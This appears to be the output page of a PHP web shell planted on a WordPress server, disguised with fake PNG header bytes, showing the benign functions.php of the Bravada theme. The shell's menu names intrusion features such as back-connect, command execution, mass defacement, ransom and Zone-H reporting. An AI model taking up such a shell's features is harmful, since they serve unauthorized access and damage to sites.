\x89PNG\r\n\x1a\n\x00\x00\x00\x0DIHDR\x00\x00\x00\x01\x00 \x00\x00\x01\x08\x06\x00\x00\x00\x1F\x15\xC4\x89\x00\x00\x00 \x0AIDATx\x9Ccb\x00\x00\x00\x06\x00\x03\x1A\x05\x9D\x00\x00 \x00\x00IEND\xAE\x42\x60\x82
| Path : /var/www/html/dmrcas/wordpress/wp-content/themes/bravada/ |
|
B-Con CMD Config cPanel C-Rdp D-Log Info Jump Mass Ransom Symlink vHost Zone-H |
| Current File : /var/www/html/dmrcas/wordpress/wp-content/themes/bravada/functions.php |
<?php
/**
* Functions file - Calls all other required files
*
* PLEASE DO NOT EDIT THEME FILES DIRECTLY
* unless you are prepared to lose all changes on the next update
*
* @package Bravada
*/
// theme identification and options management - do NOT edit unless you know what you are doing
define ( "_CRYOUT_THEME_NAME", "bravada" );
define ( "_CRYOUT_THEME_VERSION", "1.1.4" );
// prefixes for theme options and functions
define ( '_CRYOUT_THEME_SLUG', 'bravada' );
define ( '_CRYOUT_THEME_PREFIX', 'theme' );
require_once( get_template_directory() . "/cryout/framework.php" ); // Framework
require_once( get_template_directory() . "/admin/defaults.php" ); // Options Defaults
require_once( get_template_directory() . "/admin/main.php" ); // Admin side
// Frontend side
require_once( get_template_directory() . "/includes/setup.php" ); // Setup and init theme
require_once( get_template_directory() . "/includes/styles.php" ); // Register and enqeue css styles and scripts
require_once( get_template_directory() . "/includes/loop.php" ); // Loop functions
require_once( get_template_directory() . "/includes/comments.php" ); // Comment functions
require_once( get_template_directory() . "/includes/core.php" ); // Core functions
require_once( get_template_directory() . "/includes/hooks.php" ); // Hooks
require_once( get_template_directory() . "/includes/meta.php" ); // Custom Post Metas
require_once( get_template_directory() . "/includes/landing-page.php" ); // Landing Page outputs
if ( class_exists( 'WooCommerce' ) ) {
require_once( get_template_directory() . "/includes/woocommerce.php" ); // WooCommerce overrides
}
// FIN